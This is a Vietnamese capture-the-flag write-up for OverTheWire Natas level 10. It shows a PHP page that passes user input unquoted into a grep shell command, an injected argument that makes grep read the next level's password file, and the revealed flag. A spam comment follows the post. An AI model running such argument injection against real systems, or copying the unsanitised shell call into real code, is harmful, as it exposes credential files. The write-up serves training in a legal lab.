[OverTheWire] Natas – Level 10

http://natas10.natas.labs.overthewire.org/

For security reasons, we now filter on certain characters
Find words containing…

Tương tự bài 09, nhưng có vẻ như đã escape mất rồi Xem source:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

$key = "";

if(array_key_exists("needle", $_REQUEST)) {

$key = $_REQUEST["needle"];

}

if($key != "") {

if(preg_match('/[;|&]/',$key)) {

print "Input contains an illegal character!";

} else {

passthru("grep -i $key dictionary.txt");

}

Như vậy các ký tự bị lọc là:

[ ; | & ]

Cũng đâu có sao nhỉ, không có ; thì cũng vẫn được mà Inject với input:

'' /etc/natas_webpass/natas11

Kết quả:

/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
dictionary.txt:
dictionary.txt:African
dictionary.txt:Africans
dictionary.txt:Allah
dictionary.txt:Allah's
...

→ flag = U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK.

One thought on “[OverTheWire] Natas – Level 10”

LastShana says:

11/01/2018 at 15:17

I have noticed you don’t monetize your site,
don’t waste your traffic, you can earn extra cash every month
because you’ve got hi quality content. If you want to know how to make extra money, search for:
Mertiso’s tips best adsense alternative

Yêu CTF

CTF chưa bao giờ khiến tôi mệt mỏi…

[OverTheWire] Natas – Level 10

One thought on “[OverTheWire] Natas – Level 10”

Leave a Reply Cancel reply